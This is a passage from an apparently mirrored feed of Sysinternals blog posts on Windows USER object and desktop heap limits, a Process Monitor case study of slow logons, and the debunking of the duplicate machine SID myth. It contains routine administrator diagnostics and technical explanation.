leaks objects by allocating them and not deleting them when it’s through using them. You can easily verify this limit by running the Sysinternals <A href="#" target="_blank"> Testlimit </A> utility with the –u switch, which directs Testlimit to create as many USER objects as it can: </P> <P> <IMG alt="image" border="0" height="121" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121198iA9C6A7C36D4C4917" title="image" width="554" /> </P> <P> The window manager keeps track of how many USER objects a process allocates, which you can see when you add the USER Objects column to Process Explorer’s display, so that you can keep tabs on the number of objects processes allocate. This screenshot shows that, as expected, Windows system processes, including Lsass.exe (the Local Security Authority Subsystem) and service processes like Svchost, don’t allocate USER objects because they have no user interface: </P> <P> <IMG alt="image" border="0" height="213" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_46.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121199i2A943DF78EB82AF2" title="image" width="260" /> </P> <P> Process Explorer shows the number of USER objects a process has allocated on the Performance page of a process’s process properties dialog: </P> <P> <IMG alt="image" border="0" height="121" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_53.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121200iA5E4C714ACA2AB5A" title="image" width="227" /> </P> <P> One fundamental limitation on the number of USER objects comes from the fact that their identifiers were 16-bit values in the first versions of Windows, which were 16-bit. When 32-bit support was added in later versions, USER identifiers had to remain restricted to 16-bit values so that 16-bit processes could interact with windows and other USER objects created by 32-bit processes. Thus, 65,535 (2^16) is the limit on the total number of USER objects that can be created on a session (and for historical reasons, windows must have even-numbered identifiers, so there can be a maximum of 32,768 windows per session). You can verify this limit by running multiple copies of Testlimit with the –u switch until you can’t create any more. Assuming the processes you already have running aren’t using an excessive number of objects, you should be able to run 7 copies, where the first 6 allocate 10,000 objects and the last allocates the difference between the number of already allocated objects and 65,535: </P> <P> <IMG alt="image" border="0" height="375" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121201i873C8FC63A62764A" title="image" width="554" /> </P> <P> Be sure that you’re prepared to hard power-off your system when you do this because the desktop may become unusable. Many operations, like even opening the start menu’s shutdown menu, require USER objects, and when no more can be allocated the system will behave in bizarre ways. I wasn’t even able to terminate a Notepad process I had running by clicking on its close menu button after USER objects had been exhausted. </P> <P> So far I’ve talked only about the limits associated with absolute number of USER objects a process or window station can allocate, but there are other limits caused by the storage used for the USER objects themselves. Each desktop has its own region of memory, called the desktop heap, from which most USER objects created on the desktop are allocated. Because desktop heaps are stored in Session Space and 32-bit address spaces limit the amount of kernel-mode address space, the sizes of desktop heaps are capped at a relatively modest amount. They also vary in size depending on the type of desktop they are for and whether the system is a 32-bit or 64-bit system. </P> <P> Matthew Justice’s <A href="#" target="_blank"> Desktop Heap Overview </A> and <A href="#" target="_blank"> Desktop Heap, Part 2 </A> articles from the NT Debugging Blog do an excellent job of documenting desktop heap sizes up through Windows Vista SP1. This table summarizes the sizes across Windows versions up through Windows Server 2008 R2: </P> <TABLE border="1" cellpadding="0" cellspacing="0" width="615"> <TBODY> <TR> <TD valign="top" width="166"> </TD> <TD align="center" valign="top" width="92"> <STRONG> Interactive Desktop </STRONG> </TD> <TD align="center" valign="top" width="117"> <STRONG> Non-Interactive Desktop </STRONG> </TD> <TD align="center" valign="top" width="114"> <STRONG> Winlogon Desktop </STRONG> </TD> <TD align="center" valign="top" width="124"> <STRONG> Disconnect Desktop </STRONG> </TD> </TR> <TR> <TD valign="top" width="166"> <STRONG> Windows XP 32-bit </STRONG> </TD> <TD align="center" valign="top" width="92"> 3 MB </TD> <TD align="center" valign="top" width="117"> 512 KB </TD> <TD align="center" valign="top" width="114"> 128 KB </TD> <TD align="center" valign="top" width="124"> 64 KB </TD> </TR> <TR> <TD valign="top" width="166"> <STRONG> Windows Server 2003 32-bit </STRONG> </TD> <TD align="center" valign="top" width="92"> 3 MB </TD> <TD align="center" valign="top" width="117"> 512 KB </TD> <TD align="center" valign="top" width="114"> 128 KB </TD> <TD align="center" valign="top" width="124"> 64 KB </TD> </TR> <TR> <TD valign="top" width="166"> <STRONG> Windows Server 2003 64-bit </STRONG> </TD> <TD align="center" valign="top" width="92"> 20 MB </TD> <TD align="center" valign="top" width="117"> 768 KB </TD> <TD align="center" valign="top" width="114"> 192 KB </TD> <TD align="center" valign="top" width="124"> 96 KB </TD> </TR> <TR> <TD valign="top" width="166"> <STRONG> Windows Vista/Windows Server 2008 32-bit </STRONG> </TD> <TD align="center" valign="top" width="92"> 12 MB </TD> <TD align="center" valign="top" width="117"> 512 KB </TD> <TD align="center" valign="top" width="114"> 128 KB </TD> <TD align="center" valign="top" width="124"> 64 KB </TD> </TR> <TR> <TD valign="top" width="166"> <STRONG> Windows Vista/Windows Server 2008 64-bit </STRONG> </TD> <TD align="center" valign="top" width="92"> 20 MB </TD> <TD align="center" valign="top" width="117"> 768 KB </TD> <TD align="center" valign="top" width="114"> 192 KB </TD> <TD align="center" valign="top" width="124"> 96 KB </TD> </TR> <TR> <TD valign="top" width="166"> <STRONG> Windows 7 32-bit </STRONG> </TD> <TD align="center" valign="top" width="92"> 12 MB </TD> <TD align="center" valign="top" width="117"> 512 KB </TD> <TD align="center" valign="top" width="114"> 128 KB </TD> <TD align="center" valign="top" width="124"> 64 KB </TD> </TR> <TR> <TD valign="top" width="166"> <STRONG> Windows 7/Windows Server 2008 R2 64-bit </STRONG> </TD> <TD align="center" valign="top" width="92"> 20 MB </TD> <TD align="center" valign="top" width="117"> 768 KB </TD> <TD align="center" valign="top" width="114"> 192 KB </TD> <TD align="center" valign="top" width="124"> 96 KB </TD> </TR> </TBODY> </TABLE> <P> It’s worth noting that the original release of Windows Vista 32-bit had the 3 MB Interactive Heap size that previous 32-bit versions of Windows had. After the release our telemetry showed us that some users occasionally ran out of heap, presumably because they were running more applications on systems that had more memory, so SP1 raised the size to 12 MB. It’s also possible to override the default desktop heap sizes with registry settings described in Matthew’s article. </P> <P> On versions of Windows prior to Windows Vista, you can use the Microsoft <A href="#" target="_blank"> Desktop Heap Monitor </A> tool to view the sizes of the Desktop Heaps and how much of each is in use. Here’s the output of the tool on a 32-bit Windows XP system showing that only 5.6% of heap (172 KB) on the interactive desktop, Default, has been consumed: </P> <P> <IMG alt="image" border="0" height="200" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121202iE2C1C580ED033809" title="image" width="504" /> </P> <P> The tool hasn’t been updated for Windows Vista because the larger desktop heap sizes on newer versions of Windows mean that desktop heap is rarely exhausted before other USER object limits are hit. However, you can use Testlimit with the –u and –i switches to see how the system behaves when interactive desktop heap exhaustion occurs. The switch combination has Testlimit create window class data structures that have 4 KB of extra class storage until it fails. Here’s the output of Testlimit when run immediately after I captured the above Desktop Heap Monitor output. 2823 KB plus the 172 KB that Desktop Heap Monitor said was already allocated equals about 3 MB: </P> <P> <IMG alt="image" border="0" height="118" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image70_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121203i5496049C8FF538F1" title="image" width="396" /> </P> <P> Though there’s no way to determine how much heap is in use on newer systems, the window manager writes an event to the system event log when there’s heap exhaustion that can help troubleshoot window manager issues: </P> <P> <IMG alt="image" border="0" height="315" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_18.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121204iA4BF29297697EBCD" title="image" width="454" /> </P> <P> That covers USER object limits. Stay tuned for Part 2, where I’ll discuss the limits related to window manager GDI objects. </P> </BODY></HTML> Thu, 27 Jun 2019 07:00:28 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-user-and-gdi-objects-8211-part-1/ba-p/723881 MarkRussinovich 2019-06-27T07:00:28Z The Case of the Slow Logons https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slow-logons/ba-p/723866 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jan 12, 2010 </STRONG> <BR /> <P> <EM> Update:&nbsp; The Active Directory team has released useful guides for troubleshooting slow logon issues: </EM> </P> <UL> <LI> <A href="#" target="_blank"> <EM> http://social.technet.microsoft.com/wiki/contents/articles/10130.root-causes-for-slow-boots-and-logons.aspx </EM> </A> </LI> <LI> <A href="#" target="_blank"> <EM> http://social.technet.microsoft.com/wiki/contents/articles/10128.tools-for-troubleshooting-slow-boots-and-slow-logons.aspx </EM> </A> </LI> <LI> <A href="#" target="_blank"> <EM> http://social.technet.microsoft.com/wiki/contents/articles/10123.troubleshooting-slow-operating-system-boot-times-and-slow-user-logons.aspx </EM> </A> </LI> </UL> <P> Emails containing troubleshooting cases keep arriving in my inbox. I’ve received many cases that start with a seemingly unsolvable problem and end a few steps later with a solution or - often just as useful - a workaround. I’ve amassed several hundred such cases that I’ve captured in over 400 PowerPoint slides, giving me great material from which to draw for my blog and the <EM> Case of the Unexplained </EM> <EM> talk series </EM> <EM> </EM> I’ve delivered at a number of major industry conferences </P> <P> I’m always looking for fresh cases, use of obscure tool features, and unique troubleshooting techniques, so please keep them coming. This time, I’m sharing a fascinating case that highlights two useful techniques: comparing Sysinternals <A href="#" target="_blank"> Process Monitor </A> logs from working and problematic systems, and using Sysinternals <A href="#" target="_blank"> PsExec </A> to capture activity during a logon. </P> <P> The case begins when a systems administrator at a large company got multiple end-user complaints that logon was taking over three minutes. The users didn’t encounter any problems once logged on, but the delays were understandably frustrating. Many other users running with the same software configuration weren’t experiencing issues, however. Looking for commonalities, the administrator queried the network configuration database and, sure enough, saw that all the systems with complaints were Dell Precision 670 workstations. He thought he had a major clue until he looked he saw that the systems running without issue included seemingly identical 670 workstations. </P> <P> Looking for clues more directly, his next step was to try to analyze the logon process of the delayed systems. He used PsExec to run <A href="#" target="_blank"> Process Explorer </A> in the Local System account so that it would survive a logoff and be active at the next logon. Because the systems were running Windows XP, the command-line he used was the following (see the end of the post for how to do this on Windows Vista and higher): </P> <BLOCKQUOTE> <P> <FONT face="cour"> psexec –sid c:\sysint\procexp.exe </FONT> </P> </BLOCKQUOTE> <P> The “-s” directs PsExec to launch the process in the Local System account, “–i” to connect the process with the interactive desktop so that its windows are visible, and “-d” to return immediately instead of waiting for the process to terminate. Note that if you have Fast User Switching enabled and you are not logged into session 0, do not log out, but instead switch users, login to the problematic account, and then switch back to the session from which you started PsExec. </P> <P> At the subsequent logon, he noticed that Lisa_client_7.0.0.0.exe, the company’s own system inventory line-of-business (LoB) application, consumed CPU for a short time, went idle for three minutes, then exited, after which the logon process would continue as normal: </P> <P> <IMG alt="image" border="0" height="71" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheLogonScriptHangs_CCDE/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121187i7B5DB4CE1BABDBDE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> <A href="#" target="_blank"> David Solomon </A> coined a phrase back before Process Monitor replaced Filemon and Regmon that still applies when updated: “When in doubt, run Process Monitor!” (I follow this advice religiously, even having my daughter run Process Monitor when she comes to me with a homework question). This case is a great example of that philosophy put into practice because it seems unlikely on the surface that Process Monitor would reveal the cause for a process hang, but the administrator turned to the tool nonetheless. </P> <P> After launching Process Monitor with PsExec and capturing a logon trace, he scrolled to the beginning of the captured data and started his analysis. Because of what he saw in Process Explorer, the Lisa_client process was the obvious suspect, so he right-clicked on its process name in one of the trace lines and selected the <EM> Include </EM> quick-filter menu item to remove from the display entries related to activity from other processes: </P> <P> <IMG alt="image" border="0" height="219" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheLogonScriptHangs_CCDE/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121188i5E0D82F9D2D589BB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="249" /> </P> <P> When troubleshooting a hang with Process Monitor, you should first see if there are any gaps in operation time stamps that match the hang duration. You can look for lengthy operations by adding the <EM> Duration </EM> column to the display and then making sure to filter out operations that commonly don’t immediately complete, like directory change notifications. That can be useful when you don’t see a significant time gap between operations because the process has multiple threads, some of which continue to operate while the one causing the hang is dormant. </P> <P> To his pleasant surprise, he soon found an event that not only preceded a gap of exactly three minutes, but that had an unusual result code, IO DEVICE ERROR: </P> <P> <IMG alt="image" border="0" height="69" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheLogonScriptHangs_CCDE/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121189i50F5ECEA30C99E68" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> It appeared that the Lisa_client process performed a SCSI pass-through command to the disk hosting the C: volume that timed-out after three minutes with a hardware error. Wondering what the result of the command was on one of the 670’s that logged on promptly, he captured a trace from one and saw that the corresponding operation took less than a millisecond and was successful: </P> <P> <IMG alt="image" border="0" height="66" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheLogonScriptHangs_CCDE/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121190iB5795B5951144D51" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The evidence clearly pointed at a hardware issue with the disks installed on a subset of the 670’s, so he gathered disk type data from all the 670’s, correlated them with the reports of slow logons, and found that all of the slow systems had Seagate disks and the others had Fujitsu disks. </P> <P> His company was obviously not going to replace disks just to avoid an issue being caused by its own LoB application, so he had to figure out a workaround. He notified the Lisa_client development team of the issue, who reported that they could remove the command without loss of functionality, but that it would take at least several days for the update to go through their internal release process. Having a few days where system information wouldn’t be collected for a subset of systems was less important than end-user productivity, so in the meantime he wrote a WMI logon script to query the system disk and launch Lisa_client only if it wasn’t a Seagate model. </P> <P> Without Process Monitor’s help he would have probably determined that the disks were the key hardware difference, but it’s not clear he would have discovered the root cause and been able to work around it rather than resort to replacing disks. This is yet another case solved with the help of Process Monitor and insightful detective work. </P> <P> In closing, I mentioned that I would provide steps for configuring an application to survive logoff and logon on Windows Vista, Windows Server 2008 and higher. The PsExec command I supplied for Windows XP won’t work on newer operating systems because Windows Vista introduced <A href="#" target="_blank"> Session 0 Isolation </A> , requiring a couple of extra commands to make the launched application accessible after a logon. First, start the utility in session 0 with this PsExec command in an elevated command prompt: </P> <BLOCKQUOTE> <P> <FONT face="cour"> psexec –sd –i 0 c:\sysint\procmon.exe </FONT> </P> </BLOCKQUOTE> <P> You’ll see a window titled “Interactive services dialog detection” flash in the taskbar, indicating that a process is running with a window on the hidden session 0 desktop. Click on the taskbar window to restore the notification dialog and then on the Show Me the Message button to switch to that desktop: </P> <P> <IMG alt="image" border="0" height="201" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheLogonScriptHangs_CCDE/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121191iCCEDABBC5CD8B844" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <P> The utility you launched will be visible there and you can configure it with desired settings (it’s running in the Local System account so won’t have your own account’s defaults). When done, click on the Return button to get back to the main desktop. You can now logoff and log back on to reproduce the problem you’re investigating. After logging on again, execute the following commands in an elevated command prompt to cause the doorway to the session 0 desktop to reappear: </P> <BLOCKQUOTE> <P> <FONT face="cour"> net stop ui0detect <BR /> </FONT> <FONT face="cour"> net start ui0detect </FONT> </P> </BLOCKQUOTE> <P> Go back to the session 0 desktop to look at the captured information and close the tool. </P> <P> One last thing I want to leave you with is a reminder that I’ve documented many other troubleshooting cases in this blog and you can find them in the blog index <A href="#" target="_blank"> here </A> . You can also watch recordings of my <EM> Case of the Unexplained </EM> sessions from TechEd <A href="#" target="_blank"> here </A> and be sure to come to <A href="#" target="_blank"> TechEd US this June in New Orleans </A> , where I’ll be delivering it again with all new cases. </P> </BODY></HTML> Thu, 27 Jun 2019 06:58:58 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slow-logons/ba-p/723866 MarkRussinovich 2019-06-27T06:58:58Z The Machine SID Duplication Myth (and Why Sysprep Matters) https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-machine-sid-duplication-myth-and-why-sysprep-matters/ba-p/723859 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Nov 03, 2009 </STRONG> <BR /> <P> On November 3 2009, Sysinternals retired <A href="#" mce_href="#" target="_blank"> NewSID </A> , a utility that changes a computers <EM> machine Security Identifier </EM> (machine SID). I wrote NewSID in 1997 (its original name was NTSID) because the only tool available at the time for changing machine SIDs was the Microsoft <A href="#" mce_href="#" target="_blank"> Sysprep </A> tool, and Sysprep doesn’t support changing the SIDs of computers that have applications installed. A machine SID is a unique identifier generated by Windows Setup that Windows uses as the basis for the SIDs for administrator-defined local accounts and groups. After a user logs on to a system, they are represented by their account and group SIDs with respect to object authorization (permissions checks). If two machines have the same machine SID, then accounts or groups on those systems might have the same SID. It’s therefore obvious that having multiple computers with the same machine SID on a network poses a security risk, right? At least that’s been the conventional wisdom. </P> <P> The reason that I began considering NewSID for retirement is that, although people generally reported success with it on Windows Vista, I hadn’t fully tested it myself and I got occasional reports that some Windows component would fail after NewSID was used. When I set out to look into the reports I took a step back to understand how duplicate SIDs could cause problems, a belief that I had taken on faith like everyone else. The more I thought about it, the more I became convinced that machine SID duplication – having multiple computers with the same machine SID – doesn’t pose any problem, security or otherwise. I took my conclusion to the Windows security and deployment teams and no one could come up with a scenario where two systems with the same machine SID, whether in a Workgroup or a Domain, would cause an issue. At that point the decision to retire NewSID became obvious. </P> <P> I realize that the news that it’s okay to have duplicate machine SIDs comes as a surprise to many, especially since changing SIDs on imaged systems has been a fundamental principle of image deployment since Windows NT’s inception. This blog post debunks the myth with facts by first describing the machine SID, explaining how Windows uses SIDs, and then showing that - with one exception - Windows never exposes a machine SID outside its computer, proving that it’s okay to have systems with the same machine SID. Note that Sysprep resets other machine-specific state that, if duplicated, can cause problems for certain applications like Windows Server Update Services (WSUS), so MIcrosoft's support policy will still require cloned systems to be made unique with Sysprep. </P> <P mce_keep="true"> </P> <H3> SIDs </H3> <P> Windows uses SIDs to represent not just machines, but all <EM> security principals. </EM> Security principals include machines, domain computer accounts, users and security groups. Names are simply user-friendly representations for SIDs, allowing you to rename an account and not have to update access control lists (ACLs) that reference the account to reflect the change. A SID is a variable-length numeric value that consists of a structure revision number, a 48-bit identifier authority value, and a variable number of 32-bit subauthority or relative identifier (RID) values. The authority value identifies the agent that issued the SID, and this agent is typically a Windows local system or a domain. Subauthority values identify trustees relative to the issuing authority, and RIDs are simply a way for Windows to create unique SIDs based on a common base SID. </P> <P> You can use the Sysinternals <A href="#" mce_href="#" target="_blank"> PsGetSid </A> tool to view a machine’s SID by running it with no command-line arguments: </P> <P> <IMG alt="image" border="0" height="144" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121179i70E1255B17FD53B9" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Here, the revision number is 1, the authority is 5, and there are four subauthority values. At one point during the design of Windows NT, the machine SID might have been used for network identification, so in order to assure uniqueness, the SID that Setup generates has one fixed subauthority value (21) and three randomly-generated subauthority values (the numbers following “S-1-5-21” in the output). </P> <P> Even before you create the first user account on a system, Windows defines several built-in users and groups, including the Administrator and Guest accounts. Instead of generating new random SIDs for these accounts, Windows ensures their uniqueness by simply appending a per-account unique number, called a <EM> Relative Identifier </EM> (RID), to the machine SID. The RIDs for these initial accounts are predefined, so the Administrator user always has a RID of 500: </P> <P> <IMG alt="image" border="0" height="150" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_1.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121180i8B1A558BD09AF3FE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> After installation, Windows assigns new local user and group accounts with RIDs starting at 1000. You can use PsGetSid to view the name of the account for a specified SID, and here you can see that the local SID that has a RID of 1000 is for the Abby account, the name of the administrator account Windows prompted me to name during setup: </P> <P> <IMG alt="image" border="0" height="127" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_2.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121181iD24407ADA0DC1C7B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> In addition to these dynamically created SIDs, Windows defines a number of accounts that always have predefined SIDs, not just RIDs. One example is the Everyone group, which has the SID S-1-1-0 on every Windows system: </P> <P> <IMG alt="image" border="0" height="136" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_3.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121182iB108AD303213F91B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Another example, is the Local System account (System), which is the account in which several system processes like Session Manager (Smss.exe), the Service Control Manager (Services.exe) and Winlogon (Winlogon.exe) run: </P> <P> <IMG alt="image" border="0" height="141" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_4.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121183i431EA579EFAD24A8" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <H3> SIDs and Access Control Lists </H3> <P> When an account logs on to a Windows system, the Local Security Authority Subsystem (LSASS -Lsass.exe) creates a logon session and a <EM> token </EM> for the session. A token is a data structure the Windows kernel defines to represent the account and it contains the account’s SID, the SIDs of the groups that the account belongs to at the time it authenticated, and the security privileges assigned to the account and the groups. When the last token that references a logon session is deleted, LSASS deletes the logon session and the user is considered logged off. Here you can see my interactive logon session, displayed with the Sysinternals <A href="#" mce_href="#" target="_blank"> LogonSessions </A> utility: </P> <P> <IMG alt="image" border="0" height="150" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_5.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121184i30A076E16F6B5E46" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> And here you can see a token Lsass has created for the session in Process Explorer’s handle view. Note that number following the account name, 7fdee, matches the logon session ID shown by LogonSessions: </P> <P> <IMG alt="image" border="0" height="162" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_6.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121185i22463EA02EB2A356" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="334" /> </P> <P> By default, processes inherit a copy of their parent process’s token. Every process running in my interactive session, for example, has a copy of the token that they inherited originally from the Userinit.exe process, the process Winlogon creates as the first of any interactive logon. You can view the contents of a process’s token by double-clicking on the process in <A href="#" mce_href="#" target="_blank"> Process Explorer </A> and switching to the Security page of the process properties dialog: </P> <P> <IMG alt="image" border="0" height="410" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_7.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/NewSIDRetirementandtheSIDDuplicationMyth_102D5/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121186iAB27CADE9C0B9D50" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="354" /> </P> <P> When one of my processes opens an operating system object, like a file or registry key, the security subsystem executes a permission check that evaluates entries in the object’s access control list (ACL) that reference a SID included in the process’s token. </P> <P> A similar check happens for remote logon sessions, which are the kind created by a “net use” of a remote computer’s share. To successfully connect to a share you must authenticate to the remote system with an account known to that system. If the computer is part of a Workgroup, then the credentials you specify must be for a local account on the remote system; for a Domain-joined system, the credentials can be for a remote system’s local account or a Domain account. When you access a file on the share, the file server driver on that system uses the token from the logon session for the permission check, leveraging a mechanism called <EM> impersonation </EM> . </P> <H3> SID Duplication </H3> <P> The Microsoft-supported way to create a Windows installation that’s ready for deployment to a group of computers is to install Windows on a reference computer and prepare the system for cloning by running the Sysprep tool. This is called <EM> generalizing </EM> the image, because when you boot an image created using this process, Sysprep <EM> specializes </EM> the installation by generating a new machine SID, triggering plug-and-play hardware detection, resetting the product activation clock, and setting other configuration data like the new computer name. </P> <P> However, some IT administrators install Windows on one of their systems, install and configure applications, then use deployment tools that don’t reset the SIDs of the copies of the Windows installations. The best practice up to now has been to run a SID-resetting utility like NewSID to change SIDs. These utilities generate a new machine SID, try to find all the locations on a system, including all the file system and registry ACLs, that contain copies of the machine SID, and update them to the new SID. The reason that Microsoft doesn’t support systems modified in this way is that, unlike Sysprep, these tools don’t necessarily know about all the places where Windows stashes away references to the machine SID. The reliability and security of a system that has a mix of the old and new machine SID can’t be guaranteed. </P> <P> So is having multiple computers with the same machine SID a problem? The only way it would be is if Windows ever references the machine SIDs of other computers. For example, if when you connected to a remote system, the local machine SID was transmitted to the remote one and used in permissions checks, duplicate SIDs would pose a security problem because the remote system wouldn’t be able to distinguish the SID of the inbound remote account from a local account with the same SID (where the SIDs of both accounts have the same machine SID as their base and the same RID). However as we reviewed, Windows doesn’t allow you to authenticate to another computer using an account known only to the local computer. Instead, you have to specify credentials for either an account local to the remote system or to a Domain account for a Domain the remote computer trusts. The remote computer retrieves the SIDs for a local account from its own Security Accounts Database (SAM) and for a Domain account from the Active Directory database on a Domain Controller (DC). The remote computer never references the machine SID of the connecting computer. </P> <P> In other words, it’s not the SID that ultimately gates access to a computer, but an account’s user name and password: simply knowing the SID of an account on a remote system doesn’t allow you access to the computer or any resources on it.&nbsp; As further evidence that a SID isn’t sufficient, remember that built-in accounts like the Local System account have the same SID on every computer, something that would be a major security hole if it was. </P> <P> As I said earlier, there’s one exception to rule, and that’s DCs themselves. Every Domain has a unique <EM> Domain SID </EM> that’s the machine SID of the system that became the Domain’s first DC, <EM> </EM> and all machine SIDs for the Domain’s DCs match the Domain SID. So in some sense, that’s a case where machine SIDs do get referenced by other computers. That means that Domain member computers cannot have the same machine SID as that of the DCs and therefore Domain. However, like member computers, each DC also has a computer account in the Domain, and that’s the identity they have when they authenticate to remote systems. </P> <P> Some articles on SID duplication, including this <A href="#" mce_href="#" target="_blank"> KB article </A> , warn that if multiple computers have the same SID, that resources on removable media like an NTFS-formatted firewire disk can’t be secured to a local account. What they fail to mention is that permissions on removable media provide no security regardless, because a user can connect them to computers running operating systems that don’t honor NTFS permissions. Moreover, removable media tend to have default permissions that grant access to well-known SIDs, such as to the Administrators group, which are the same on all systems. That’s the fundamental rule of physical security and why Windows 7 introduced Bitlocker-to-Go, which enables you to encrypt removable storage. </P> <P> The final case where SID duplication would be an issue is if a distributed application used machine SIDs to uniquely identify computers. No Microsoft software does so and using the machine SID in that way doesn’t work just for the fact that all 